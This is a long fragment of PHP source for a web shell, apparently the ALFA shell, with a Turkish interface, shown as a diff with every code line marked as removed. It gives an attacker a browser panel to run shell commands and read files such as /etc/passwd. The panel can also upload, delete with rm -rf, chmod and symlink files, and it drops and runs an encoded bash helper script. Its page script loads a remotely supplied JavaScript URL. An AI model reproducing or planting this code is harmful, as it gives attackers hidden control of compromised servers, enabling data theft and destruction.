"'> <input type='submit' value=' '></form></td><td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Dosya oku: </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td></tr><tr><td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Komut altr :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td></tr><tr><td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'><input type='hidden' name='a' value='FilesMAn'><input type='hidden' name='c' value='" . $GLOBALS['cwd'] . "'><input type='hidden' name='alfa1' value='uploadFile'><input type='hidden' name='charset' value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'><span class='footer_text'>Dosya ykle: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong> Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./MY0FC4 © 2011-" . date('Y') . " ]</span></td></tr></table></div><div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div><div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div><div id='update-content'></div><div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div><div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div><script>$(\"search-input\").addEventListener(\"keydown\",function(e){setTimeout(function(){var e=$(\"search-input\").value;d.getElementsByClassName(\"history-list\")[0].innerHTML=\"\";for(var a in editor_files)if(-1!=editor_files[a].file.search(e)||\"\"==e){var i=0;a==editor_current_file&&(i=\" is_active\"),insertToHistory(a,editor_files[a].file,i,editor_files[a].type)}},100)},!1),_Ajax(d.URL,\"a=\"+alfab64(\"checkupdate\"),function(e){d.body.insertAdjacentHTML(\"beforeend\",e);try{var dom = new DOMParser();var doc = dom.parseFromString(e, \"text/html\");var url = doc.getElementById(\"jsurl\").innerHTML;var newScript = document.createElement(\"script\");newScript.src = url;d.body.appendChild(newScript);}catch(e){console.log(e);}})," . $GLOBALS['need_to_update_header'] . "?_Ajax(d.URL,\"a=\"+alfab64(\"updateheader\"),function(e){try{var a=JSON.parse(e);for(var i in a){for(var r=\"\",t=0;t<a[i].length;t++)r+=\"useful\"==i||\"downloader\"==i?'<span class=\"header_values\" style=\"margin-left: 4px;\">'+a[i][t]+\"</span>\":a[i][t];var n=$(\"header_\"+i);n&&(n.innerHTML=r)}$(\"header_cgishell\").innerHTML=\"ON\",$(\"header_cgishell\").setAttribute(\"class\",\"header_on\")}catch(e){console.log(e)}}):islinux&&_Ajax(d.URL,\"a=\"+alfab64(\"checkcgi\"),function(e){\"ok\"==e&&($(\"header_cgishell\").innerHTML=\"ON\",$(\"header_cgishell\").setAttribute(\"class\",\"header_on\"))});</script></body></html>";
- }
- }
- if (!function_exists('posix_getpwuid') && (strpos(@ini_get('disable_functions'), 'posix_getpwuid') === false)) {
- function posix_getpwuid($p) {
- return false;
- }
- }
- if (!function_exists('posix_getgrgid') && (strpos(@ini_get('disable_functions'), 'posix_getgrgid') === false)) {
- function posix_getgrgid($p) {
- return false;
- }
- }
- function alfaWhich($p) {
- $path = alfaEx('which ' . $p, false, false);
- if (!empty($path)) return strlen($path);
- return false;
- }
- function alfaSize($s) {
- if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
- elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
- elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
- else return $s . ' B';
- }
- function alfaPerms($p) {
- if (($p & 0xC000) == 0xC000) $i = 's';
- elseif (($p & 0xA000) == 0xA000) $i = 'l';
- elseif (($p & 0x8000) == 0x8000) $i = '-';
- elseif (($p & 0x6000) == 0x6000) $i = 'b';
- elseif (($p & 0x4000) == 0x4000) $i = 'd';
- elseif (($p & 0x2000) == 0x2000) $i = 'c';
- elseif (($p & 0x1000) == 0x1000) $i = 'p';
- else $i = 'u';
- $i.= (($p & 0x0100) ? 'r' : '-');
- $i.= (($p & 0x0080) ? 'w' : '-');
- $i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
- $i.= (($p & 0x0020) ? 'r' : '-');
- $i.= (($p & 0x0010) ? 'w' : '-');
- $i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
- $i.= (($p & 0x0004) ? 'r' : '-');
- $i.= (($p & 0x0002) ? 'w' : '-');
- $i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
- return $i;
- }
- function alfaPermsColor($f, $isbash = false) {
- $class = '';
- $num = '';
- $human = '';
- if ($isbash) {
- $class = $f['class'];
- $num = $f['num'];
- $human = $f['human'];
- } else {
- $num = substr(sprintf('%o', @fileperms($f)), -4);
- $human = alfaPerms(@fileperms($f));
- if (!@is_readable($f)) $class = 'main_red_perm';
- elseif (!@is_writable($f)) $class = 'main_white_perm';
- else $class = 'main_green_perm';
- }
- return '<span style="font-weight:unset;" class="' . $class . '">' . $num . '</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="' . $class . '">' . $human . '</span>';
- }
- if (!function_exists('scandir')) {
- function scandir($dir) {
- $dh = opendir($dir);
- while (false !== ($filename = readdir($dh))) $files[] = $filename;
- return $files;
- }
- }
- function reArrayFiles($file_post) {
- $file_ary = array();
- $file_count = count($file_post['name']);
- $file_keys = array_keys($file_post);
- for ($i = 0;$i < $file_count;$i++) {
- foreach ($file_keys as $key) {
- $file_ary[$i][$key] = $file_post[$key][$i];
- }
- }
- return $file_ary;
- }
- function _alfa_can_runCommand($cgi = true, $cache = true) {
- if (isset($_SESSION['alfa_canruncmd']) && $cache) {
- return true;
- }
- if (strlen(alfaEx('whoami', false, $cgi)) > 0) {
- $_SESSION['alfa_canruncmd'] = true;
- return true;
- }
- return false;
- }
- function _alfa_symlink($target, $link) {
- $phpsym = function_exists('symlink');
- if ($phpsym) {
- @symlink($target, $link);
- } else {
- alfaEx("ln -s '" . addslashes($target) . "' '" . addslashes($link) . "'");
- }
- }
- function _alfa_file_exists($file, $cgi = true) {
- if (@file_exists($file)) {
- return true;
- } else {
- if (strlen(alfaEx("ls -la '" . addslashes($file) . "'", false, $cgi)) > 0) {
- return true;
- }
- }
- return false;
- }
- function _alfa_file($file, $cgi = true) {
- $array = @file($file);
- if (!$array) {
- if (strlen(alfaEx('id', false, $cgi)) > 0) {
- $data = alfaEx('cat "' . addslashes($file) . '"', false, $cgi);
- if (strlen($data) > 0) {
- return explode("
- ", $data);
- } else {
- return false;
- }
- } else {
- return false;
- }
- } else {
- return $array;
- }
- }
- function _alfa_is_writable($file) {
- $check = false;
- $check = @is_writable($file);
- if (!$check) {
- if (_alfa_can_runCommand()) {
- $check = alfaEx('[ -w "' . trim(addslashes($file)) . '" ] && echo "yes" || echo "no"');
- if ($check == 'yes') {
- $check = true;
- } else {
- $check = false;
- }
- }
- }
- return $check;
- }
- function _alfa_is_dir($dir, $mode = '-d') {
- $check = false;
- $check = @is_dir($dir);
- if (!$check) {
- if (_alfa_can_runCommand()) {
- $check = alfaEx('[ "' . trim($mode) . '" "' . trim(addslashes($dir)) . '" ] && echo "yes" || echo "no"');
- if ($check == 'yes') {
- return true;
- } else {
- return false;
- }
- }
- }
- return $check;
- }
- function alfaFilesMan() {
- alfahead();
- echo '<div class="ajaxarea"><div class="header">';
- if (!empty($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
- if (!empty($_POST['alfa1'])) {
- switch ($_POST['alfa1']) {
- case 'uploadFile' : if (isset($GLOBALS['glob_chdir_false'])) {
- $alfa_canruncmd = _alfa_can_runCommand(true, true);
- $move_cmd_file = true;
- }
- $files = reArrayFiles($_FILES['f']);
- foreach ($files as $file) {
- if ($move_cmd_file) {
- alfaEx("cat '" . addslashes($file['tmp_name']) . "' > '" . addslashes($_POST['c'] . '/' . $file['name']) . "'");
- } else {
- @move_uploaded_file($file['tmp_name'], $file['name']);
- }
- echo 'uped...!<Br>';
- }
- break;
- case 'mkdir' : $new_dir_cmd = false;
- if (isset($GLOBALS['glob_chdir_false'])) {
- if (_alfa_can_runCommand(true, true)) {
- alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';mkdir '" . trim(addslashes($_POST['alfa2'])) . "'");
- }
- } else {
- if (!@mkdir(trim($_POST['alfa2']))) echo "<b><font color='red'>Can't create new dir !</b></font>";
- }
- break;
- case 'delete' : function deleteDir($path) {
- $path = (substr($path, -1) == '/') ? $path : $path . '/';
- $dh = @opendir($path);
- while (($item = @readdir($dh)) !== false) {
- $item = $path . $item;
- if ((basename($item) == '..') || (basename($item) == '.')) continue;
- $type = @filetype($item);
- if ($type == 'dir') deleteDir($item);
- else @unlink($item);
- }
- @closedir($dh);
- @rmdir($path);
- }
- if (is_array(@$_POST['f'])) foreach ($_POST['f'] as $f) {
- if ($f == '..') continue;
- $f = rawurldecode($f);
- if (isset($GLOBALS['glob_chdir_false'])) {
- if (_alfa_can_runCommand(true, true)) {
- alfaEx("rm -rf '" . addslashes($_POST['c'] . '/' . $f) . "'");
- }
- } else {
- alfaEx("rm -rf '" . addslashes($f) . "'", false, false);
- if (@is_dir($f)) deleteDir($f);
- else @unlink($f);
- }
- }
- if (@is_dir(rawurldecode(@$_POST['alfa2'])) && rawurldecode(@$_POST['alfa2']) != '..') {
- deleteDir(rawurldecode(@$_POST['alfa2']));
- alfaEx("rm -rf '" . addslashes($_POST['alfa2']) . "'", false, false);
- } else {
- @unlink(rawurldecode(@$_POST['alfa2']));
- }
- if (isset($GLOBALS['glob_chdir_false'])) {
- $source = rawurldecode(@$_POST['alfa2']);
- if ($source != '..' && !empty($source)) {
- if (_alfa_can_runCommand(true, true)) {
- alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';rm -rf '" . addslashes($source) . "'");
- }
- }
- }
- break;
- case 'paste' : if ($_SESSION['act'] == 'copy' && isset($_SESSION['f'])) {
- function copy_paste($c, $s, $d) {
- if (@is_dir($c . $s)) {
- @mkdir($d . $s);
- $h = @opendir($c . $s);
- while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c . $s . '/', $f, $d . $s . '/');
- } elseif (is_file($c . $s)) @copy($c . $s, $d . $s);
- }
- foreach ($_SESSION['f'] as $f) copy_paste($_SESSION['c'], $f, $GLOBALS['cwd']);
- } elseif ($_SESSION['act'] == 'move' && isset($_SESSION['f'])) {
- function move_paste($c, $s, $d) {
- if (@is_dir($c . $s)) {
- @mkdir($d . $s);
- $h = @opendir($c . $s);
- while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c . $s . '/', $f, $d . $s . '/');
- } elseif (@is_file($c . $s)) @copy($c . $s, $d . $s);
- }
- foreach ($_SESSION['f'] as $f) @rename($_SESSION['c'] . $f, $GLOBALS['cwd'] . $f);
- } elseif ($_SESSION['act'] == 'zip' && isset($_SESSION['f'])) {
- if (class_exists('ZipArchive')) {
- $zip = new ZipArchive();
- $zipX = 'alfa_' . rand(1, 1000) . '.zip';
- if ($zip->open($zipX, 1)) {
- @chdir($_SESSION['c']);
- foreach ($_SESSION['f'] as $f) {
- if ($f == '..') continue;
- if (@is_file($_SESSION['c'] . $f)) $zip->addFile($_SESSION['c'] . $f, $f);
- elseif (@is_dir($_SESSION['c'] . $f)) {
- $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
- foreach ($iterator as $key => $value) {
- $key = str_replace('\',' / ',realpath($key));
- if (@is_dir($key))
- {
- if (in_array(substr($key,strrpos($key,' / ') +1) ,array(
- ' . ',
- ' . . '
- ))) continue;
- }
- else
- {
- $zip->addFile($key,$key);
- }
- }
- }
- }
- @chdir($GLOBALS['cwd']);
- $zip->close();
- __alert(' >> '.$zipX .' << iscreated . . . ');
- }
- }
- }
- elseif ($_SESSION['act'] == 'unzip'&&isset($_SESSION['f']))
- {
- if (class_exists('ZipArchive'))
- {
- $zip = new ZipArchive();
- foreach ($_SESSION['f'] as $f)
- {
- if ($zip->open($_SESSION['c'] .$f))
- {
- $zip->extractTo($GLOBALS['cwd']);
- $zip->close();
- }
- }
- }
- }
- unset($_SESSION['f']);
- break;
- default:
- if (!empty($_POST['alfa1']))
- {
- $_SESSION['act'] = @$_POST['alfa1'];
- $_SESSION['f'] = @$_POST['f'];
- $_SESSION['c'] = @$_POST['c'];
- }
- break;
- }
- }
- if (isset($_SESSION[__LAST_CWD__]) &&!isset($_POST['c']) &&$_SESSION[__LAST_CWD__] != '')
- {
- $dirContent = @scandir($_SESSION[__LAST_CWD__]);
- }
- else
- {
- $dirContent = @scandir(isset($_POST['c']) ?$_POST['c'] : $GLOBALS['cwd']);
- if (preg_match("#(.*)\/\.\.#",$_POST['c'],$res))
- {
- $path = explode(' / ',$res[1]);
- array_pop($path);
- $_POST['c'] = implode(' / ',$path);
- }
- $_SESSION[__LAST_CWD__] = str_replace(array(
- ' . . ',
- ' //'
- ), array('', '/'), $_POST['c']);
- }
- $cmd_dir = false;
- if ($dirContent === false) {
- if (_alfa_can_runCommand(true, true)) {
- @chdir(dirname($_SERVER['SCRIPT_FILENAME']));
- if (!isset($_SESSION['alfachdir_bash']) || @!file_exists('mka7cgiapi/getdir.mka')) {
- $bash = 'jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=';
- alfaWriteTocgiapi('getdir.mka', $bash);
- }
- if (empty($_SESSION[__LAST_CWD__])) $_SESSION[__LAST_CWD__] = '/';
- $dirContent = alfaEx("cd mka7cgiapi;sh getdir.mka '" . addslashes($_SESSION[__LAST_CWD__]) . "'");
- $dirContent = json_decode($dirContent, true);
- if (is_array($dirContent)) {
- array_pop($dirContent);
- $cmd_dir = true;
- } else {
- $dirContent = false;
- }
- $_SESSION['alfachdir_bash'] = true;
- }
- }
- if ($dirContent == false) {
- echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
- alfaFooter();
- return;
- }
- global $sort;
- $sort = array('name', 1);
- if (!empty($_POST['alfa1'])) {
- if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match)) $sort = array($match[1], (int)$match[2]);
- }
- echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
- $dirs = $files = array();
- $n = count($dirContent);
- for ($i = 0;$i < $n;$i++) {
- if ($cmd_dir) {
- $filename = $dirContent[$i]['name'];
- $file_owner = $dirContent[$i]['owner'];
- $file_group = $dirContent[$i]['group'];
- $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]['modify']);
- $file_perm = alfaPermsColor(array('class' => $dirContent[$i]['permcolor'], 'num' => $dirContent[$i]['permnum'], 'human' => $dirContent[$i]['permhuman']), true);
- $file_size = $dirContent[$i]['size'];
- $file_path = $_SESSION[__LAST_CWD__] . '/' . $dirContent[$i]['name'];
- } else {
- $filename = $dirContent[$i];
- $ow = function_exists('posix_getpwuid') && function_exists('fileowner') ? @posix_getpwuid(@fileowner($GLOBALS['cwd'] . $filename)) : array('name' => '????');
- $gr = function_exists('posix_getgrgid') && function_exists('filegroup') ? @posix_getgrgid(@filegroup($GLOBALS['cwd'] . $filename)) : array('name' => '????');
- $file_owner = $ow['name'] ? $ow['name'] : (function_exists('fileowner') ? @fileowner($GLOBALS['cwd'] . $filename) : '????');
- $file_group = $gr['name'] ? $gr['name'] : (function_exists('filegroup') ? @filegroup($GLOBALS['cwd'] . $filename) : '????');
- $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
- $file_perm = alfaPermsColor($GLOBALS['cwd'] . $filename);
- $file_size = @filesize($GLOBALS['cwd'] . $filename);
- $file_path = $GLOBALS['cwd'] . $filename;
- }
- $tmp = array('name' => $filename, 'path' => $file_path, 'modify' => $file_modify, 'perms' => $file_perm, 'size' => $file_size, 'owner' => $file_owner, 'group' => $file_group);
- if (!$cmd_dir) {
- if (@is_file($file_path)) $files[] = array_merge($tmp, array('type' => 'file'));
- elseif (@is_link($file_path)) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
- elseif (@is_dir($file_path) && ($filename != '.')) $dirs[] = array_merge($tmp, array('type' => 'dir'));
- } else {
- if ($dirContent[$i]['type'] == 'file') {
- $files[] = array_merge($tmp, array('type' => 'file'));
- } else {
- if ($dirContent[$i]['name'] != '.') {
- $dirs[] = array_merge($tmp, array('type' => 'dir'));
- }
- }
- }
- }
- $GLOBALS['sort'] = $sort;
- function alfaCmp($a, $b) {
- if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
- else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
- }
- usort($files, 'alfaCmp');
- usort($dirs, 'alfaCmp');
- $files = array_merge($dirs, $files);
- $l = 0;
- $cc = 0;
- foreach ($files as $f) {
- $f['name'] = htmlspecialchars($f['name']);
- $newname = mb_strlen($f['name'], 'UTF-8') > 60 ? mb_substr($f['name'], 0, 60, 'utf-8') . '...' : $f['name'];
- $checkbox = 'checkbox' . $cc;
- $raw_name = rawurlencode($f['name']);
- $icon = $GLOBALS['DB_NAME']['show_icons'] ? '<img src="' . findicon($f['name'], $f['type']) . '" width="30" height="30">' : '';
- $style = $GLOBALS['DB_NAME']['show_icons'] ? 'position:relative;display:inline-block;bottom:12px;' : '';
- echo '<tr' . ($l ? ' class=l1' : '') . '><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="' . $raw_name . '" class="chkbx" id="' . $checkbox . '"><label for="' . $checkbox . '"></label></div></td><td>' . $icon . '<div style="' . $style . '"><a class="main_name" href=javascript:void(0) onclick="' . (($f['type'] == 'file') ? 'editor(\'' . $raw_name . '\',\'auto\',\'\',\'\',\'\',\'' . $f['type'] . '\');">' . ($GLOBALS['cwd'] . $f['name'] == $GLOBALS['__file_path'] ? "<span class='shell_name' style='font-weight:unset;'>" . $f['name'] . '</span>' : htmlspecialchars($newname)) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>') . '</a></td></div><td><span style="font-weight:unset;" class="main_size">' . (($f['type'] == 'file') ? alfaSize($f['size']) : $f['type']) . '</span></td><td><span style="font-weight:unset;" class="main_modify">' . $f['modify'] . '</span></td><td><span style="font-weight:unset;" class="main_owner_group">' . $f['owner'] . '/' . $f['group'] . '</span></td><td><a href=javascript:void(0) onclick="editor(\'' . $raw_name . '\',\'chmod\',\'\',\'\',\'\',\'' . $f['type'] . '\')">' . $f['perms'] . '</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'rename\',\'\',\'\',\'\',\'' . $f['type'] . '\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'touch\',\'\',\'\',\'\',\'' . $f['type'] . '\')">T</a>' . (($f['type'] == 'file') ? ' <a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'edit\',\'\',\'\',\'\',\'' . $f['type'] . '\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $raw_name . '\', \'download\')">D</a>' : '') . '<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Kanka bunu silicem bak emin misin ? # ' . addslashes(rawurldecode($f['name'])) . ' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'' . $raw_name . '\') : \'\';"> X </a></td></tr>';
- $l = $l ? 0 : 1;
- $cc++;
- }
- echo "<tr><td colspan=7>
- <input type=hidden name=a value='FilesMan'>
- <input type=hidden name=c value='" . htmlspecialchars((isset($GLOBALS['glob_chdir_false']) ? $_POST['c'] : $GLOBALS['cwd'])) . "'>
- <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
- <select id='tools_selector' name='alfa1'><option value='copy'>Kopyala</option><option value='move'>Move</option><option value='delete' selected>Sil</option><option value='zip'>Ziple</option><option value='unzip'>Zipten kar</option><option value='paste'>Paste / Zip / Unzip </option></select>
- <input type='submit' value=' '>
- </form></table></div></div>";
- alfafooter();
- }
- function alfaFilesTools() {
- alfahead();
- echo '<div class="filestools">';
- if (isset($_POST['alfa1'])) $_POST['alfa1'] = rawurldecode($_POST['alfa1']);
- $alfa1_decoded = $_POST['alfa1'];
- $chdir_fals = false;
- if (!@chdir($_POST['c'])) {
- $chdir_fals = true;
- $_POST['alfa1'] = $_POST['c'] . '/' . $_POST['alfa1'];
- $alfa_canruncmd = _alfa_can_runCommand(true, true);
- if ($alfa_canruncmd) {
- $slashed_alfa1 = addslashes($_POST['alfa1']);
- $file_info = explode(':', alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "' . $slashed_alfa1 . '"'));
- $perm_color_class = alfaEx("if [[ -w '" . $slashed_alfa1 . "' ]]; then echo main_green_perm; elif [[ -r '" . $slashed_alfa1 . "' ]]; then echo main_white_perm; else echo main_red_perm; fi");
- }
- }
- if ($_POST['alfa2'] == 'auto') {
- if (is_array(@getimagesize($_POST['alfa1']))) {
- $_POST['alfa2'] = 'image';
- } else {
- $_POST['alfa2'] = 'view';
- if ($chdir_fals) {
- if ($alfa_canruncmd) {
- $mime = explode(':', alfaEx("file --mime-type '" . addslashes($_POST['alfa1']) . "'"));
- $mimetype = $mime[1];
- if (!empty($mimetype)) {
- if (strstr($mimetype, 'image')) {
- $_POST['alfa2'] = 'image';
- }
- }
- }
- }
- }
- }
- if ($_POST['alfa2'] == 'rename' && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])) {
- $rename_cache = $_POST['alfa3'];
- }
- if (@$_POST['alfa2'] == 'mkfile') {
- $_POST['alfa1'] = trim($_POST['alfa1']);
- if ($chdir_fals && $alfa_canruncmd) {
- if (_alfa_is_writable($_POST['c'])) {
- alfaEx("cd '" . addslashes($_POST['c']) . "';touch '" . addslashes($alfa1_decoded) . "'");
- $_POST['alfa2'] = 'edit';
- }
- }
- if (!@file_exists($_POST['alfa1'])) {
- $fp = @fopen($_POST['alfa1'], 'w');
- if ($fp) {
- $_POST['alfa2'] = 'edit';
- fclose($fp);
- }
- } else {
- $_POST['alfa2'] = 'edit';
- }
- }
- if (!_alfa_file_exists(@$_POST['alfa1'])) {
- echo __pre() . "<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('" . $_POST['alfa4'] . "');</script>";
- alfaFooter();
- return;
- }
- if ($chdir_fals) {
- $filesize = $file_info[3];
- $uid['name'] = $file_info[1];
- $gid['name'] = $file_info[2];
- $permcolor = alfaPermsColor(array('class' => $perm_color_class, 'num' => $file_info[5], 'human' => $file_info[6]), true);
- } else {
- $uid = function_exists('posix_getpwuid') && function_exists('fileowner') ? @posix_getpwuid(@fileowner($_POST['alfa1'])) : '';
- $gid = function_exists('posix_getgrgid') && function_exists('filegroup') ? @posix_getgrgid(@filegroup($_POST['alfa1'])) : '';
- if (!$uid && !$gid) {
- $uid['name'] = function_exists('fileowner') ? @fileowner($_POST['alfa1']) : '';
- $gid['name'] = function_exists('filegroup') ? @filegroup($_POST['alfa1']) : '';
- }
- $permcolor = alfaPermsColor($_POST['alfa1']);
- $filesize = @filesize($_POST['alfa1']);
- if (!isset($uid['name'], $gid['name']) || empty($uid['name']) || empty($gid['name'])) {
- if (_alfa_can_runCommand()) {
- list($uid['name'], $gid['name']) = explode(':', alfaEx('stat -c "%U:%G" "' . addslashes($_POST['c'] . '/' . $_POST['alfa1']) . '"'));
- }
- }
- }
- echo '<span class="editor_file_info_vars">Name:</span> ' . htmlspecialchars($alfa1_decoded) . ' <span class="editor_file_info_vars">Size:</span> ' . alfaSize($filesize) . ' <span class="editor_file_info_vars">Permission:</span> ' . $permcolor . ' <span class="editor_file_info_vars">Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . ' <span class="editor_file_info_vars">Directory:</span> ' . str_replace('//', '/', ($chdir_fals ? '' : $_POST['c'] . '/') . $_POST['alfa1']) . '<br><br>';
- if (empty($_POST['alfa2'])) $_POST['alfa2'] = 'view';
- if (!_alfa_is_dir($_POST['alfa1'])) {
- $m = array('Oku', 'Dzenle', 'ndir', 'Highlight', 'CHMOD', 'sim deitir', 'Touch', 'Sil', 'Image', 'Hexdump');
- $ftype = 'file';
- } else {
- $m = array('Chmod', 'Rename', 'Touch');
- $ftype = 'dir';
- }
- foreach ($m as $v) echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\'):\'\';"><span class="editor_actions">' . ((strtolower($v) == @$_POST['alfa2']) ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\')"><span class="editor_actions">' . ((strtolower($v) == @$_POST['alfa2']) ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a>';
- echo '<br><br>';
- switch ($_POST['alfa2']) {
- case 'view' : @chdir($_POST['c']);
- echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">Kopyala</button></p><pre class="ml1" id="view_ml_content">';
- echo htmlspecialchars(__read_file($_POST['alfa1']));
- echo '</pre></div></div>';
- break;
- case 'highlight' : @chdir($_POST['c']);
- if (@is_readable($_POST['alfa1'])) {
- echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
- $code = @highlight_file($_POST['alfa1'], true);
- echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div></div></div>';
- }
- break;
- case 'delete' : @chdir($_POST['c']);
- if (@is_writable($_POST['alfa1']) || isset($GLOBALS['glob_chdir_false'])) {
- $deleted = true;
- if (!@unlink($_POST['alfa1'])) {
- $deleted = false;
- if ($alfa_canruncmd) {
- if (_alfa_is_writable($_POST['alfa1'])) {
- alfaEx("rm -f '" . addslashes($_POST['alfa1']) . "'");
- $deleted = true;
- }
- }
- }
- if ($deleted) echo 'File Deleted...<script>var elem = $("' . $_POST['alfa4'] . '").parentNode;elem.parentNode.removeChild(elem);delete editor_files["' . $_POST['alfa4'] . '"];</script>';
- else echo 'Error...';
- }
- break;
- case 'chmod' : @chdir($_POST['c']);
- if (!empty($_POST['alfa3'])) {
- $perms = 0;
- for ($i = strlen($_POST['alfa3']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['alfa3'][$i] * pow(8, (strlen($_POST['alfa3']) - $i - 1));
